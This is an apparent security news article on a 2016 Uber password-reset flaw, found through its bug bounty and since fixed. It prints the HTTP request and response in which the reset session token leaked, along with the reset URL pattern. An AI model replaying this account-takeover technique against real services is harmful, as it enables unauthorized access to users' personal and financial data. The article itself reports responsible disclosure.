An Italian expert discovered a critical Improper Authentication vulnerability affecting the UBER platform that allowed password reset for any account.

The Italian security expert Vincenzo C. Aka @Procode701 has discovered 7 months ago a critical vulnerability in UBER platform that allowed password reset for any Uber account.

The researcher reported the ‘Improper Authentication’ vulnerability through the company Bug Bounty program operated by Hackerone.

“With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.” reads the summary published UBER.

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The Italian expert has discovered a serious problem in the password reset process that could be exploited to generate an authentication token “inAuthSessionID” that could be used to change the password for any account.

I contacted the experts for further details and he told me that just sending a password reset request using a valid email address of any Uber account, the reply included the session token “inAuthSessionID.” The Uber platform was generating a specific session token every time a user was sending password reset email.

Once obtained the session token “inAuthSessionID” it was possible to change the password using the standard link that is present in the change password form.

https://auth.uber.com/login/stage/PASTE SESSION ID <— inAuthSessionID generated through the chaneg password email /af9b9d0c-bb98-41de-876c-4cb91 1c79bd1 <– tokenID with no expiration date.

POST /login/handleanswer HTTP/1.1 Host: auth.uber.com { "init": false, "answer": { "type": "PASSWORD_RESET_WITH_EMAIL", "userIdentifier": { "email": "xxxx@uber.com" } } } Reply HTTP/1.1 200 OK { "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388a b4bbf28", "stage": { "question": { "signinToken": "", "type": "VERIFY_PASSWORD_RESET", "tripChallenges": [] }, "alternatives": [] } }

The impact of the vulnerability is severe, it allowed a hacker to access any account and any user’s data (i.e. ID Card, banking data, Driver License), including financial one.

Below the timeline of the vulnerability:

October 2, 2016 – Bug reported to the company

October 4, 2016 – Flaw Triaged

October 6, 2016 – Flaw Resolved

October 18, 2016 – Researcher rewarded with $10,000 USD.

Pierluigi Paganini

(Security Affairs – Improper Authentication flaw, hacking)

Share this...

Linkedin Reddit Pinterest

Share On